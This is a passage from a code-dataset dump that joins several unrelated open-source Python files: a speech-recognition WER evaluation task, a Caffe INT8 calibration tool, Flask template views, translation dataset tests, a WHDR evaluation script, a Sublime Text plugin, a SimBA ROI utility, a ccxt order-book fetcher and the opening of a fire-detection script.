ignore_invalid_inputs=False,
):
# we do not need to filter by size in this task as dataloaders take care of this
return indices
def valid_step(self, sample, model, criterion):
loss, sample_size, logging_output = super().valid_step(sample, model, criterion)
if getattr(self.args, "eval_wer", False) and not self.is_ctc:
metrics = self._inference_with_wer(self.sequence_generator, sample, model)
logging_output["_num_char_errors"] = metrics["num_char_errors"]
logging_output["_num_chars"] = metrics["num_chars"]
logging_output["_num_word_errors"] = metrics["num_word_errors"]
logging_output["_num_words"] = metrics["num_words"]
return loss, sample_size, logging_output
def build_model(self, args):
model = super().build_model(args)
if getattr(args, 'eval_wer', False) and not self.is_ctc:
self.sequence_generator = self.build_generator([model], args, )
self.tokenizer = encoders.build_tokenizer(args)
return model
def _inference_with_wer(self, generator, sample, model):
def decode(toks, escape_unk=True):
s = self.target_dictionary.string(
toks.int().cpu(),
self.args.eval_wer_remove_bpe,
escape_unk=escape_unk,
extra_symbols_to_ignore={generator.eos},
)
if self.tokenizer:
s = self.tokenizer.decode(s)
return s
num_word_errors, num_char_errors = 0, 0
num_chars, num_words = 0, 0
gen_out = self.inference_step(generator, [model], sample, None)
for i in range(len(gen_out)):
hyp = decode(gen_out[i][0]["tokens"])
ref = decode(
utils.strip_pad(sample["target"][i], self.target_dictionary.pad()),
escape_unk=True,
)
hyp = post_process(hyp, self.args.eval_wer_remove_bpe).strip("_")
ref = post_process(ref, self.args.eval_wer_remove_bpe).strip("_")
num_char_errors += editdistance.eval(hyp, ref)
num_chars += len(ref)
hyp_words = hyp.split("_")
ref_words = ref.split("_")
num_word_errors += editdistance.eval(hyp_words, ref_words)
num_words += len(ref_words)
return {
"num_char_errors": num_char_errors,
"num_chars": num_chars,
"num_word_errors": num_word_errors,
"num_words": num_words,
}
def reduce_metrics(self, logging_outputs, criterion):
super().reduce_metrics(logging_outputs, criterion)
zero = torch.scalar_tensor(0.)
num_char_errors = sum(log.get("_num_char_errors", zero) for log in logging_outputs)
num_chars = sum(log.get("_num_chars", zero) for log in logging_outputs)
num_word_errors = sum(log.get("_num_word_errors", zero) for log in logging_outputs)
num_words = sum(log.get("_num_words", zero) for log in logging_outputs)
metrics.log_scalar("_num_char_errors", num_char_errors)
metrics.log_scalar("_num_chars", num_chars)
metrics.log_scalar("_num_word_errors", num_word_errors)
metrics.log_scalar("_num_words", num_words)
if num_words > 0:
metrics.log_derived(
"uer",
lambda meters: meters["_num_char_errors"].sum * 100.0 / meters["_num_chars"].sum
if meters["_num_chars"].sum > 0 else float("nan")
)
metrics.log_derived(
"wer",
lambda meters: meters["_num_word_errors"].sum * 100.0 / meters["_num_words"].sum
if meters["_num_words"].sum > 0 else float("nan")
)
| 1.859375 | 2 |
caffe-int8-convert-tool-dev.py | daquexian/caffe-int8-convert-tools | 0 | 11034 | <reponame>daquexian/caffe-int8-convert-tools<gh_stars>0
# -*- coding: utf-8 -*-
# SenseNets is pleased to support the open source community by making caffe-int8-convert-tool available.
#
# Copyright (C) 2018 SenseNets Technology Ltd. All rights reserved.
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
"""
Quantization module for generating the calibration tables will be used by
quantized (INT8) models from FP32 models.
This tool is based on Caffe Framework.
"""
from __future__ import division
from __future__ import print_function
import argparse
import numpy as np
import math, copy
import matplotlib.pyplot as plt
import sys,os
import caffe
import caffe.proto.caffe_pb2 as caffe_pb2
import time
import datetime
from google.protobuf import text_format
def parse_args():
parser = argparse.ArgumentParser(
description='find the pretrained caffe models int8 quantize scale value')
parser.add_argument('--proto', dest='proto',
help="path to deploy prototxt.", type=str)
parser.add_argument('--model', dest='model',
help='path to pretrained weights', type=str)
parser.add_argument('--mean', dest='mean',
help='value of mean', type=float, nargs=3)
parser.add_argument('--norm', dest='norm',
help='value of normalize', type=float, nargs=1, default=1.0)
parser.add_argument('--images', dest='images',
help='path to calibration images', type=str)
parser.add_argument('--output', dest='output',
help='path to output calibration table file', type=str, default='calibration-dev.table')
parser.add_argument('--group', dest='group',
help='enable the group scale', type=int, default=0)
parser.add_argument('--gpu', dest='gpu',
help='use gpu to forward', type=int, default=0)
args = parser.parse_args()
return args, parser
global args, parser
args, parser = parse_args()
# global params
QUANTIZE_NUM = 127
STATISTIC = 1
INTERVAL_NUM = 2048
# ugly global params
quantize_layer_lists = []
class QuantizeLayer:
def __init__(self, name, blob_name, group_num):
self.name = name
self.blob_name = blob_name
self.group_num = group_num
self.weight_scale = [0 for x in range(0, group_num)]
self.blob_max = [0 for x in range(0, group_num)]
self.blob_distubution_interval = [0 for x in range(0, group_num)]
self.blob_distubution = [[0 for col in range(INTERVAL_NUM)] for row in range(group_num)]
self.blob_scale = [1 for x in range(0, group_num)]
self.group_zero = [0 for x in range(0, group_num)]
def quantize_weight(self, weight_data):
# spilt the weight data by group num
blob_group_data = np.array_split(weight_data, self.group_num)
for i, group_data in enumerate(blob_group_data):
max_val = np.max(group_data)
min_val = np.min(group_data)
threshold = max(abs(max_val), abs(min_val))
if threshold < 0.0001:
self.weight_scale[i] = 0
self.group_zero[i] = 1
else:
self.weight_scale[i] = QUANTIZE_NUM / threshold
print("%-20s group : %-5d max_val : %-10f scale_val : %-10f" % (self.name + "_param0", i, threshold, self.weight_scale[i]))
def initial_blob_max(self, blob_data):
# spilt the blob data by group num
blob_group_data = np.array_split(blob_data, self.group_num)
# interval for per bottom blob group channel
for i, group_data in enumerate(blob_group_data):
max_val = np.max(group_data)
min_val = np.min(group_data)
self.blob_max[i] = max(self.blob_max[i], max(abs(max_val), abs(min_val)))
def initial_blob_distubution_interval(self):
for i in range(0, self.group_num):
if self.blob_max[i] < 0.000001:
self.blob_scale[i] = 0
self.group_zero[i] = 1
self.blob_distubution_interval[i] = 0
else:
self.blob_distubution_interval[i] = STATISTIC * self.blob_max[i] / INTERVAL_NUM
print("%-20s group : %-5d max_val : %-10.8f distribution_intervals : %-10.8f" % (self.name, i, self.blob_max[i], self.blob_distubution_interval[i]))
def initial_histograms(self, blob_data):
# spilt the blob data by group num
blob_group_data = np.array_split(blob_data, self.group_num)
# interval for per bottom blob group channel
for i, group_data in enumerate(blob_group_data):
if self.blob_scale[i] == 0:
continue
else:
# collect histogram of every group channel blob
add_to_distribution(group_data, self.blob_distubution[i], self.blob_distubution_interval[i])
def quantize_blob(self):
# calculate threshold
for i in range(0, self.group_num):
# sparse DepthwiseConvolution
if self.blob_scale[i] == 0:
print("%-20s group : %-5d bin : %-8d threshold : %-10f interval : %-10f scale : %-10f" % (self.name, i, 0, 0, self.blob_distubution_interval[i], self.blob_scale[i]))
else:
# normalize distributions
normalize_distribution(self.blob_distubution[i])
distribution = np.array(self.blob_distubution[i])
# pick threshold which minimizes KL divergence
threshold_bin = threshold_distribution(distribution)
threshold = (threshold_bin + 0.5) * self.blob_distubution_interval[i]
# get the activation calibration value
self.blob_scale[i] = QUANTIZE_NUM / threshold
print("%-20s group : %-5d bin : %-8d threshold : %-10f interval : %-10f scale : %-10f" % (self.name, i, threshold_bin, threshold, self.blob_distubution_interval[i], self.blob_scale[i]))
def display_sparse_info(self):
count = 0
for i in range(self.group_num):
if self.group_zero[i] != 0:
count += 1
print("%-20s group total : %-8d group sparse : %-8d ratio : %-6.2f " % (self.name, self.group_num, count, count / float(self.group_num) * 100))
def save_calibration(file_path):
pass
def add_to_distribution(blob, distribution, interval):
"""
add the distribution
Args:
blob: the output blob of caffe layer
distribution: a list ,size is 2048
interval: a float number
Returns:
none
"""
max_index = len(distribution) - 1
indexes = np.minimum((np.abs(blob[blob!=0]) / interval).astype(np.int32), max_index)
for index in indexes:
distribution[index] = distribution[index] + 1
def normalize_distribution(distribution):
"""
Normalize the input list
Args:
distribution: a list ,size is 2048
Returns:
none
"""
num_sum = sum(distribution)
for i, data in enumerate(distribution):
distribution[i] = data / float(num_sum)
def compute_kl_divergence(dist_a, dist_b):
"""
Returen kl_divergence between
Args:
dist_a: list original
dist_b: list expand
Returns:
kl_divergence: float, kl_divergence
"""
nonzero_inds = dist_a != 0
return np.sum(dist_a[nonzero_inds] * np.log(dist_a[nonzero_inds] / dist_b[nonzero_inds]))
def threshold_distribution(distribution, target_bin=128):
"""
Returen the best cut off num of bin
Args:
distribution: list, activations has been processed by histogram and normalize,size is 2048
target_bin: int, the num of bin that is used by quantize, Int8 default value is 128
Returns:
target_threshold: int, num of bin with the minimum KL
"""
target_threshold = target_bin
min_kl_divergence = 1000
length = distribution.size
quantize_distribution = np.zeros(target_bin)
threshold_sum = 0.0
threshold_sum = sum(distribution[target_bin:])
for threshold in range(target_bin, length):
t_distribution = copy.deepcopy(distribution[:threshold])
t_distribution[threshold-1] = t_distribution[threshold-1] + threshold_sum
threshold_sum = threshold_sum - distribution[threshold]
# ************************ threshold ************************
quantize_distribution = np.zeros(target_bin)
num_per_bin = threshold / target_bin
for i in range(0, target_bin):
start = i * num_per_bin
end = start + num_per_bin
left_upper = (int)(math.ceil(start))
if(left_upper > start):
left_scale = left_upper - start
quantize_distribution[i] += left_scale * distribution[left_upper - 1]
right_lower = (int)(math.floor(end))
if (right_lower < end):
right_scale = end - right_lower
quantize_distribution[i] += right_scale * distribution[right_lower]
for j in range(left_upper, right_lower):
quantize_distribution[i] += distribution[j]
# ************************ threshold ************************
# ************************ quantize ************************
expand_distribution = np.zeros(threshold, dtype=np.float32)
for i in range(0, target_bin):
start = i * num_per_bin
end = start + num_per_bin
count = 0
left_upper = (int)(math.ceil(start))
left_scale = 0.0
if (left_upper > start):
left_scale = left_upper - start
if (distribution[left_upper - 1] != 0):
count += left_scale
right_lower = (int)(math.floor(end))
right_scale = 0.0
if (right_lower < end):
right_scale = end - right_lower
if (distribution[right_lower] != 0):
count += right_scale
for j in range(left_upper, right_lower):
if (distribution[j] != 0):
count = count + 1
if count == 0:
continue;
expand_value = quantize_distribution[i] / count
if (left_upper > start):
if (distribution[left_upper - 1] != 0):
expand_distribution[left_upper - 1] += expand_value * left_scale
if (right_lower < end):
if (distribution[right_lower] != 0):
expand_distribution[right_lower] += expand_value * right_scale
for j in range(left_upper, right_lower):
if (distribution[j] != 0):
expand_distribution[j] += expand_value
# ************************ quantize ************************
kl_divergence = compute_kl_divergence(t_distribution, expand_distribution)
if kl_divergence < min_kl_divergence:
min_kl_divergence = kl_divergence
target_threshold = threshold
return target_threshold
def net_forward(net, image_path, transformer):
"""
network inference and statistics the cost time
Args:
net: the instance of Caffe inference
image_path: a image need to be inference
transformer:
Returns:
none
"""
# load image
image = caffe.io.load_image(image_path)
# transformer.preprocess the image
net.blobs['data'].data[...] = transformer.preprocess('data',image)
# net forward
start = time.clock()
output = net.forward()
end = time.clock()
print("%s forward time : %.3f s" % (image_path, end - start))
def file_name(file_dir):
"""
Find the all file path with the directory
Args:
file_dir: The source file directory
Returns:
files_path: all the file path into a list
"""
files_path = []
for root, dir, files in os.walk(file_dir):
for name in files:
file_path = root + "/" + name
print(file_path)
files_path.append(file_path)
return files_path
def network_prepare(net, mean, norm):
"""
instance the prepare process param of caffe network inference
Args:
net: the instance of Caffe inference
mean: the value of mean
norm: the value of normalize
Returns:
none
"""
print("Network initial")
img_mean = np.array(mean)
# initial transformer
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
# convert shape from RBG to BGR
transformer.set_transpose('data', (2,0,1))
# load meanfile
transformer.set_mean('data', img_mean)
# resize image data from [0,1] to [0,255]
transformer.set_raw_scale('data', 255)
# convert RGB -> BGR
transformer.set_channel_swap('data', (2,1,0))
# normalize
transformer.set_input_scale('data', norm)
return transformer
def weight_quantize(net, net_file, group_on):
"""
CaffeModel convolution weight blob Int8 quantize
Args:
net: the instance of Caffe inference
net_file: deploy caffe prototxt
Returns:
none
"""
print("\nQuantize the kernel weight:")
# parse the net param from deploy prototxt
params = caffe_pb2.NetParameter()
with open(net_file) as f:
text_format.Merge(f.read(), params)
for i, layer in enumerate(params.layer):
if i == 0:
if layer.type != "Input":
raise ValueError("First layer should be input")
# find the convolution 3x3 and 1x1 layers to get out the weight_scale
if(layer.type == "Convolution" or layer.type == "ConvolutionDepthwise"):
kernel_size = layer.convolution_param.kernel_size[0]
if(kernel_size == 3 or kernel_size == 1):
weight_blob = net.params[layer.name][0].data
# initial the instance of QuantizeLayer Class lists,you can use enable group quantize to generate int8 scale for each group layer.convolution_param.group
if (group_on == 1):
quanitze_layer = QuantizeLayer(layer.name, layer.bottom[0], layer.convolution_param.group)
else:
quanitze_layer = QuantizeLayer(layer.name, layer.bottom[0], 1)
# quantize the weight value
quanitze_layer.quantize_weight(weight_blob)
# add the quantize_layer into the save list
quantize_layer_lists.append(quanitze_layer)
return None
def activation_sparse(net, transformer, images_files):
"""
Activation bottom blob sparse analyze
Args:
net: the instance of Caffe inference
transformer:
images_files: calibration dataset
Returns:
none
"""
print("\nAnalyze the sparse info of the Activation:")
# run float32 inference on calibration dataset to find the activations range
for i , image in enumerate(images_files):
net_forward(net, image, transformer)
print("loop stage 1 : %d" % (i))
# find max threshold
for layer in quantize_layer_lists:
blob = net.blobs[layer.blob_name].data[0].flatten()
layer.initial_blob_max(blob)
# calculate statistic blob scope and interval distribution
for layer in quantize_layer_lists:
layer.initial_blob_distubution_interval()
return None
def activation_quantize(net, transformer, images_files):
"""
Activation Int8 quantize, optimaize threshold selection with KL divergence,
given a dataset, find the optimal threshold for quantizing it.
Ref: http://on-demand.gputechconf.com/gtc/2017/presentation/s7310-8-bit-inference-with-tensorrt.pdf
Args:
net: the instance of Caffe inference
transformer:
images_files: calibration dataset
Returns:
none
"""
print("\nQuantize the Activation:")
# run float32 inference on calibration dataset to find the activations range
for i , image in enumerate(images_files):
net_forward(net, image, transformer)
print("loop stage 1 : %d" % (i))
# find max threshold
for layer in quantize_layer_lists:
blob = net.blobs[layer.blob_name].data[0].flatten()
layer.initial_blob_max(blob)
# calculate statistic blob scope and interval distribution
for layer in quantize_layer_lists:
layer.initial_blob_distubution_interval()
# for each layers
# collect histograms of activations
print("\nCollect histograms of activations:")
for i, image in enumerate(images_files):
net_forward(net, image, transformer)
print("loop stage 2 : %d" % (i))
start = time.clock()
for layer in quantize_layer_lists:
blob = net.blobs[layer.blob_name].data[0].flatten()
layer.initial_histograms(blob)
end = time.clock()
print("add cost %.3f s" % (end - start))
# calculate threshold with KL divergence
for layer in quantize_layer_lists:
layer.quantize_blob()
return None
def save_calibration_file(calibration_path):
calibration_file = open(calibration_path, 'w')
# save temp
save_temp = []
# save weight scale
for layer in quantize_layer_lists:
save_string = layer.name + "_param_0"
for i in range(layer.group_num):
save_string = save_string + " " + str(layer.weight_scale[i])
save_temp.append(save_string)
# save bottom blob scales
for layer in quantize_layer_lists:
save_string = layer.name
for i in range(layer.group_num):
save_string = save_string + " " + str(layer.blob_scale[i])
save_temp.append(save_string)
# save into txt file
for data in save_temp:
calibration_file.write(data + "\n")
calibration_file.close()
def usage_info():
"""
usage info
"""
print("Input params is illegal...╮(╯3╰)╭")
print("try it again:\n python caffe-int8-scale-tools.py -h")
def main():
"""
main function
"""
# time start
time_start = datetime.datetime.now()
print(args)
if args.proto == None or args.model == None or args.mean == None or args.images == None:
usage_info()
return None
# deploy caffe prototxt path
net_file = args.proto
# trained caffemodel path
caffe_model = args.model
# mean value
mean = args.mean
# norm value
norm = 1.0
if args.norm != 1.0:
norm = args.norm[0]
# calibration dataset
images_path = args.images
# the output calibration file
calibration_path = args.output
# enable the group scale
group_on = args.group
# default use CPU to forwark
if args.gpu != 0:
caffe.set_device(0)
caffe.set_mode_gpu()
# initial caffe net and the forword model(GPU or CPU)
net = caffe.Net(net_file,caffe_model,caffe.TEST)
# prepare the cnn network
transformer = network_prepare(net, mean, norm)
# get the calibration datasets images files path
images_files = file_name(images_path)
# quanitze kernel weight of the caffemodel to find it's calibration table
# weight_quantize(net, net_file)
weight_quantize(net, net_file, group_on)
# quantize activation value of the caffemodel to find it's calibration table
activation_quantize(net, transformer, images_files)
# save the calibration tables,best wish for your INT8 inference have low accuracy loss :)
save_calibration_file(calibration_path)
# time end
time_end = datetime.datetime.now()
print("\nCaffe Int8 Calibration table create success, it's cost %s, best wish for your INT8 inference has a low accuracy loss...\(^▽^)/...2333..." % (time_end - time_start))
if __name__ == "__main__":
main()
| 1.773438 | 2 |
example_project/views.py | AKuederle/flask-template-master | 2 | 11035 | """
All your views aka. your template endpoints go here.
There are two ways to create a view.
1. Create a new Subclass inheriting from one of the flask_template_master views
2. Use the view-factory function flask_template_master.views.create_template_endpoint
Each view requires an 1 (and 2 optional) things:
1. An environment: The environment provides the templates and handles all options of how templates are rendered
2. (optional) An global provider: A global provider provides variables that are accessible in all templates of the endpoint
3. (optional) An compiler: The compiler gets the rendered template and can handle a postprocessing step and controls the
data that is returned. This can e.g. be used to run a Latex compilation.
"""
import jinja2
from flask_template_master.compiler import LatexCompiler
from flask_template_master.views import BaseTemplateView, create_template_endpoint
from flask_template_master import Api
from flask_template_master.global_provider import DictGlobalProvider
from flask_template_master.environments import LATEX_TEMPLATE_CONFIG
api = Api() # create an instance of an flask-restfull API. Always required!
class TestView(BaseTemplateView):
"""This is an example of a view created as a subclass.
This is a simple view using a Dict loader to provide all template strings inline.
It does not use a compile step and simply returns the rendered template string on POST.
It passes one value as a global variable. This can be seen in template b.
The global variable will be overwritten, if a variable with the same name is passed by the POST request
"""
# The environment needs to be a jinja environment with a loader
ENVIRONMENT = jinja2.Environment(loader=jinja2.DictLoader({'a': '{{ test }}', 'b': '{{ test }} {{ global }}'}))
GLOBAL_PROVIDER = DictGlobalProvider({'global': 'This is a global value'})
# This registers '/class_test/' for the overview and '/class_test/<template_name> for the individual templates
TestView.add_as_resource(api, '/class_test/')
# This is an example on how to use the factory function
# Setting up the jinja2 enviroemnt using a file loader with LaTex config
environment = jinja2.Environment(loader=jinja2.FileSystemLoader('./templates'), **LATEX_TEMPLATE_CONFIG)
compiler = LatexCompiler()
create_template_endpoint(api, '/factory_test/', environment=environment, compiler=compiler)
| 3.078125 | 3 |
CustomExceptions.py | DouglasHSS/NeuralNetworks | 0 | 11036 |
class PerceptronError(Exception):
pass
| 1.195313 | 1 |
pytorch_translate/test/test_data.py | dpacgopinath/translate-1 | 0 | 11037 | <filename>pytorch_translate/test/test_data.py<gh_stars>0
#!/usr/bin/env python3
import unittest
import os
from pytorch_translate import data
from pytorch_translate import dictionary
from pytorch_translate.test import utils as test_utils
class TestInMemoryNumpyDataset(unittest.TestCase):
def setUp(self):
self.src_txt, self.trg_txt = test_utils.create_test_text_files()
self.vocab_file_path = test_utils.make_temp_file()
self.d = dictionary.Dictionary.build_vocab_file(
corpus_files=[self.src_txt, self.trg_txt],
vocab_file=self.vocab_file_path,
max_vocab_size=0,
)
# src_ref is reversed, +1 for lua
self.src_ref = [
[107, 105, 103, 101],
[105, 105, 103, 103, 101, 101],
[103, 103, 103, 103, 101, 101, 101, 101],
[101, 101, 101, 101, 101, 101, 101, 101, 101, 101],
]
self.trg_ref = [
[102, 102, 102, 102, 102, 102, 102, 102, 102, 102],
[102, 102, 102, 102, 104, 104, 104, 104],
[102, 102, 104, 104, 106, 106],
[102, 104, 106, 108],
]
self.src_txt_numberized, self.trg_txt_numberized = test_utils.create_test_numberized_data_files(
self.src_ref, self.trg_ref, reverse_source=True
)
self.lua_eos = self.d.eos_index + 1
self.num_sentences = 4
def tearDown(self):
os.remove(self.src_txt)
os.remove(self.trg_txt)
os.remove(self.vocab_file_path)
def test_parse(self):
src_dataset = data.InMemoryNumpyDataset()
trg_dataset = data.InMemoryNumpyDataset()
for _ in range(2):
src_dataset.parse(
self.src_txt, self.d, reverse_order=True, append_eos=False
)
trg_dataset.parse(
self.trg_txt, self.d, reverse_order=False, append_eos=True
)
self.assertEqual(self.num_sentences, len(src_dataset))
self.assertEqual(self.num_sentences, len(trg_dataset))
for i in range(self.num_sentences):
self.assertListEqual(self.src_ref[i], src_dataset[i].tolist())
self.assertListEqual(
self.trg_ref[i] + [self.lua_eos], trg_dataset[i].tolist()
)
def test_parse_numberize(self):
src_dataset = data.InMemoryNumpyDataset()
trg_dataset = data.InMemoryNumpyDataset()
for _ in range(2):
src_dataset.parse(
self.src_txt_numberized,
self.d,
reverse_order=True,
append_eos=False,
already_numberized=True,
)
trg_dataset.parse(
self.trg_txt_numberized,
self.d,
reverse_order=False,
append_eos=True,
already_numberized=True,
)
self.assertEqual(self.num_sentences, len(src_dataset))
self.assertEqual(self.num_sentences, len(trg_dataset))
for i in range(self.num_sentences):
self.assertListEqual(self.src_ref[i], src_dataset[i].tolist())
self.assertListEqual(
self.trg_ref[i] + [self.lua_eos], trg_dataset[i].tolist()
)
def test_parse_oversampling(self):
dataset = data.InMemoryNumpyDataset()
factors = [(1, 0), (3, 2), (4, 4)]
for o1, o2 in factors:
corpora = [
data.MultilingualCorpusConfig(
dialect_id=None,
data_file=self.trg_txt,
dict=self.d,
oversampling=o1,
),
data.MultilingualCorpusConfig(
dialect_id=None,
data_file=self.trg_txt,
dict=self.d,
oversampling=o2,
),
]
dataset.parse_multilingual(corpora)
self.assertEqual((o1 + o2) * self.num_sentences, len(dataset))
def test_parse_multiling(self):
prepend_dataset = data.InMemoryNumpyDataset()
append_dataset = data.InMemoryNumpyDataset()
corpora = [
data.MultilingualCorpusConfig(
dialect_id=10, data_file=self.trg_txt, dict=self.d, oversampling=1
),
data.MultilingualCorpusConfig(
dialect_id=11, data_file=self.trg_txt, dict=self.d, oversampling=1
),
]
lang1 = corpora[0].dialect_id + 1 # +1 for lua
lang2 = corpora[1].dialect_id + 1 # +1 for lua
prepend_dataset.parse_multilingual(
corpora, reverse_order=False, append_eos=False, prepend_language_id=True
)
append_dataset.parse_multilingual(
corpora, reverse_order=False, append_eos=False, prepend_language_id=False
)
self.assertEqual(2 * self.num_sentences, len(prepend_dataset))
self.assertEqual(2 * self.num_sentences, len(append_dataset))
for i in range(self.num_sentences):
self.assertListEqual([lang1] + self.trg_ref[i], prepend_dataset[i].tolist())
self.assertListEqual(self.trg_ref[i] + [lang1], append_dataset[i].tolist())
self.assertListEqual(
[lang2] + self.trg_ref[i],
prepend_dataset[i + self.num_sentences].tolist(),
)
self.assertListEqual(
self.trg_ref[i] + [lang2],
append_dataset[i + self.num_sentences].tolist(),
)
| 2.453125 | 2 |
CompareWHDR.py | Z7Gao/InverseRenderingOfIndoorScene | 171 | 11038 | <filename>CompareWHDR.py
import numpy as np
import sys
import json
import glob
import os.path as osp
import cv2
def compute_whdr(reflectance, judgements, delta=0.1):
points = judgements['intrinsic_points']
comparisons = judgements['intrinsic_comparisons']
id_to_points = {p['id']: p for p in points}
rows, cols = reflectance.shape[0:2]
error_sum = 0.0
error_equal_sum = 0.0
error_inequal_sum = 0.0
weight_sum = 0.0
weight_equal_sum = 0.0
weight_inequal_sum = 0.0
for c in comparisons:
# "darker" is "J_i" in our paper
darker = c['darker']
if darker not in ('1', '2', 'E'):
continue
# "darker_score" is "w_i" in our paper
weight = c['darker_score']
if weight <= 0.0 or weight is None:
continue
point1 = id_to_points[c['point1']]
point2 = id_to_points[c['point2']]
if not point1['opaque'] or not point2['opaque']:
continue
# convert to grayscale and threshold
l1 = max(1e-10, np.mean(reflectance[int(point1['y'] * rows), int(point1['x'] * cols), ...]))
l2 = max(1e-10, np.mean(reflectance[int(point2['y'] * rows), int(point2['x'] * cols), ...]))
# convert algorithm value to the same units as human judgements
if l2 / l1 > 1.0 + delta:
alg_darker = '1'
elif l1 / l2 > 1.0 + delta:
alg_darker = '2'
else:
alg_darker = 'E'
if darker == 'E':
if darker != alg_darker:
error_equal_sum += weight
weight_equal_sum += weight
else:
if darker != alg_darker:
error_inequal_sum += weight
weight_inequal_sum += weight
if darker != alg_darker:
error_sum += weight
weight_sum += weight
if weight_sum:
return (error_sum / weight_sum), error_equal_sum/( weight_equal_sum + 1e-10), error_inequal_sum/(weight_inequal_sum + 1e-10)
else:
return None
#root = './testReal_cascade0_black_height120_width160/cascade0/iiw/'
root = 'IIW_cascade1/results_brdf2_brdf1/'
rootGt = '/home/zhl/CVPR20/Resubmission/Dataset/IIW/iiw-dataset/data/'
suffix = 'albedoBS1.png'
count = 0.0
whdr_sum = 0.0
whdr_mean = 0.0
img_list = glob.glob(osp.join(root, '*_%s' % suffix ) )
for img_path in img_list:
#load CGI precomputed file
judgement_path = osp.join(rootGt, img_path.split('/')[-1].split('_')[0] + '.json' )
judgements = json.load(open(judgement_path) )
count+=1.0
ourR = cv2.imread(img_path ).astype(np.float32 ) / 255.0
whdr, _, _ = compute_whdr(ourR, judgements )
whdr_sum += whdr
print('img_path: {0}, whdr: current {1} average {2}'.
format(img_path.split('/')[-1].split('_')[0], whdr, whdr_sum / count ) )
whdr_mean = whdr_sum / count
print('whdr ours: {0}'.format(whdr_mean ) )
| 2.78125 | 3 |
theonionbox/stamp.py | ralphwetzel/theonionbox | 120 | 11039 | __title__ = 'The Onion Box'
__description__ = 'Dashboard to monitor Tor node operations.'
__version__ = '20.2'
__stamp__ = '20200119|095654'
| 0.824219 | 1 |
UnicodeTraps.py | loamhoof/sublime-plugins-dump | 0 | 11040 | import re
from sublime import Region
import sublime_plugin
REPLACEMENTS = {
'\u00a0': ' ', # no-break space
'\u200b': '', # zero-width space
}
class UnicodeTrapsListener(sublime_plugin.EventListener):
@staticmethod
def on_pre_save(view):
view.run_command('unicode_traps')
class UnicodeTraps(sublime_plugin.TextCommand):
def run(self, edit):
all_file = self.view.substr(Region(0, self.view.size()))
matches = list(re.finditer('[%s]' % ''.join(REPLACEMENTS), all_file))
for match in reversed(matches):
self.view.replace(edit, Region(*match.span()), REPLACEMENTS[match.group()])
| 2.59375 | 3 |
simba/ROI_multiply.py | KonradDanielewski/simba | 172 | 11041 | <filename>simba/ROI_multiply.py
import glob
import pandas as pd
from configparser import ConfigParser
import os
from simba.drop_bp_cords import *
def multiplyFreeHand(inifile, currVid):
_, CurrVidName, ext = get_fn_ext(currVid)
config = ConfigParser()
configFile = str(inifile)
config.read(configFile)
projectPath = config.get('General settings', 'project_path')
videoPath = os.path.join(projectPath, 'videos')
ROIcoordinatesPath = os.path.join(projectPath, 'logs', 'measures', 'ROI_definitions.h5')
try:
rectanglesInfo = pd.read_hdf(ROIcoordinatesPath, key='rectangles')
circleInfo = pd.read_hdf(ROIcoordinatesPath, key='circleDf')
polygonInfo = pd.read_hdf(ROIcoordinatesPath, key='polygons')
rectangularDf = rectanglesInfo.loc[rectanglesInfo['Video'] == str(CurrVidName)]
circleDf = circleInfo.loc[circleInfo['Video'] == str(CurrVidName)]
polygonDf = polygonInfo.loc[polygonInfo['Video'] == str(CurrVidName)]
ROIdefExist = True
except FileNotFoundError:
ROIdefExist = False
print('Cannot apply to all: no ROI definitions exists')
if ROIdefExist is True:
if (len(rectangularDf) == 0 and len(circleDf) == 0 and len(polygonDf) == 0):
print('Cannot apply ROIs to all: no records exist for ' + str(CurrVidName))
else:
videofilesFound = glob.glob(videoPath + '/*.mp4') + glob.glob(videoPath + '/*.avi')
duplicatedRec, duplicatedCirc, duplicatedPoly = (rectangularDf.copy(), circleDf.copy(), polygonDf.copy())
for vids in videofilesFound:
_, CurrVidName, ext = get_fn_ext(vids)
duplicatedRec['Video'], duplicatedCirc['Video'], duplicatedPoly['Video'] = (CurrVidName, CurrVidName, CurrVidName)
rectangularDf = rectangularDf.append(duplicatedRec, ignore_index=True)
circleDf = circleDf.append(duplicatedCirc, ignore_index=True)
polygonDf = polygonDf.append(duplicatedPoly, ignore_index=True)
rectangularDf = rectangularDf.drop_duplicates(subset=['Video', 'Name'], keep="first")
circleDf = circleDf.drop_duplicates(subset=['Video', 'Name'], keep="first")
polygonDf = polygonDf.drop_duplicates(subset=['Video', 'Name'], keep="first")
store = pd.HDFStore(ROIcoordinatesPath, mode='w')
store['rectangles'] = rectangularDf
store['circleDf'] = circleDf
store['polygons'] = polygonDf
store.close()
print('ROI(s) for ' + CurrVidName + ' applied to all videos')
print('Next, click on "draw" to modify ROI location(s) or click on "reset" to remove ROI drawing(s)')
| 2.484375 | 2 |
src/utils/ccxt/fetch_order_book.py | YasunoriMATSUOKA/crypto-asset-easy-management | 0 | 11042 | <filename>src/utils/ccxt/fetch_order_book.py
from logging import getLogger
import traceback
from .get_public_exchange import get_public_exchange
logger = getLogger("__main__").getChild(__name__)
def fetch_order_book(exchange_name, pair):
logger.debug("start")
logger.debug(exchange_name)
logger.debug(pair)
exchange = get_public_exchange(exchange_name)
try:
logger.debug("try")
order_book = exchange.fetch_order_book(pair)
logger.info("success")
except Exception as error:
logger.warning("failure")
logger.warning(error)
logger.debug(traceback.format_exc())
order_book = None
logger.debug(order_book)
logger.debug("end")
return order_book
| 2.53125 | 3 |
smoke-classifier/detect_fire.py | agnes-yang/firecam | 10 | 11043 | <reponame>agnes-yang/firecam<gh_stars>1-10
# Copyright 2018 The Fuego Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
@author: <NAME>
This is the main code for reading images from webcams and detecting fires
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import sys
fuegoRoot = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
